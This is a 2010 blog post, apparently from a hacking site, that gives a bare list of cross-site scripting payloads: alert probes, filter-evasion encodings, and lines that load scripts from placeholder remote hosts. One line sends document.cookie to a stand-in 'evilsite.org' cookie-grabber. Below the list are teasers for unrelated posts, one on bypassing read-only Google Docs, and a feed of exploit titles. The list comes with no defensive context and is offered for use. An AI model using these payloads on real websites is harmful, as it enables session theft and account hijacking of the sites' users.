XSS Cheat List

Home / Hacking, News, Security / XSS Cheat List

September 4, 2010 PlanetCreator 0 Comments 0 tags


	<script>alert(1);</script>
	<script>alert('XSS');</script>
	<script src="http://www.evilsite.org/cookiegrabber.php"></script>
	<script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script>
	<scr<script>ipt>alert('XSS');</scr</script>ipt>
	<script>alert(String.fromCharCode(88,83,83))</script>
	<img src=foo.png onerror=alert(/xssed/) />
	<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
	<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
	<marquee><script>alert('XSS')</script></marquee>
	<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">
	<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">
	<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">
	<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
	"><script>alert(0)</script>
	<script src=http://yoursite.com/your_files.js></script>
	</title><script>alert(/xss/)</script>
	</textarea><script>alert(/xss/)</script>
	<IMG LOWSRC=\"javascript:alert('XSS')\">
	<IMG DYNSRC=\"javascript:alert('XSS')\">
	<font style='color:expression(alert(document.cookie))'>
	'); alert('XSS
	<img src="javascript:alert('XSS')">
	<script language="JavaScript">alert('XSS')</script>
	[url=javascript:alert('XSS');]click me[/url]
	<body onunload="javascript:alert('XSS');">
	<body onLoad="alert('XSS');"
	[color=red' onmouseover="alert('xss')"]mouse over[/color]
	"/></a></><img src=1.gif onerror=alert(1)>
	window.alert("Bonjour !");
	<div style="x:expression((window.r==1)?'':eval('r=1;
	alert(String.fromCharCode(88,83,83));'))">
	<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
	"><script alert(String.fromCharCode(88,83,83))</script>
	'>><marquee><h1>XSS</h1></marquee>
	'">><script>alert('XSS')</script>
	'">><marquee><h1>XSS</h1></marquee>
	<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
	<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
	<script>var var = 1; alert(var)</script>
	<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
	<?='<SCRIPT>alert("XSS")</SCRIPT>'?>
	<IMG SRC='vbscript:msgbox(\"XSS\")'>
	" onfocus=alert(document.domain) "> <"
	<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
	<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
	perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
	perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
	<br size=\"&{alert('XSS')}\">
	<scrscriptipt>alert(1)</scrscriptipt>
	</br style=a:expression(alert())>
	</script><script>alert(1)</script>
	"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
	[color=red width=expression(alert(123))][color]
	<BASE HREF="javascript:alert('XSS');//">
	Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
	"></iframe><script>alert(123)</script>
	<body onLoad="while(true) alert('XSS');">
	'"></title><script>alert(1111)</script>
	</textarea>'"><script>alert(document.cookie)</script>
	'""><script language="JavaScript"> alert('X \nS \nS');</script>
	</script></script><<<<script><>>>><<<script>alert(123)</script>
	<html><noalert><noscript>(123)</noscript><script>(123)</script>
	<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
	'></select><script>alert(123)</script>
	'>"><script src = 'http://www.site.com/XSS.js'></script>
	}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
	<SCRIPT>document.write("XSS");</SCRIPT>
	a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
	='><script>alert("xss")</script>
	<script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
	<body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
	">/PlanetCreator/><script>alert(document.cookie)</script><script   src="http://www.site.com/XSS.js"></script>
	 ">/PlanetCreator/><script>alert(document.cookie)</script>
	src="http://www.site.com/XSS.js">
	data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=

Explore More

What’s Next for Virtualization: Optimizing the Environment

As the server virtualization market continues to mature and more companies adopt server virtualization as a standard within their environments, the concerns and questions we hear day to day about

Yet another simple Google Docs hack

A simple hack that allow you to edit read only Google docs is explained here http://googlesystem.blogspot.com/2009/01/copy-google-documents-to-your-account.html It works and all you need is to hack the url a bit like

Press Conference briefing on the possibility of being shortest man in the world!!!

This is not hacking or security news, just about my some favorite news while I’m arriving at yangon, myanmar. I’ve been here around 3 months and waiting visa approval to

[local] tar-fs 3.0.0 - Arbitrary File Write/Overwrite
on April 22, 2025 at 12:00 am
tar-fs 3.0.0 - Arbitrary File Write/Overwrite
[webapps] WordPress Core 6.2 - Directory Traversal
on April 22, 2025 at 12:00 am
WordPress Core 6.2 - Directory Traversal
[local] Microsoft Windows 11 23h2 - CLFS.sys Elevation of Privilege
on April 22, 2025 at 12:00 am
Microsoft Windows 11 23h2 - CLFS.sys Elevation of Privilege
[remote] OpenSSH server (sshd) 9.8p1 - Race Condition
on April 22, 2025 at 12:00 am
OpenSSH server (sshd) 9.8p1 - Race Condition
[remote] WonderCMS 3.4.2 - Remote Code Execution (RCE)
on April 22, 2025 at 12:00 am
WonderCMS 3.4.2 - Remote Code Execution (RCE)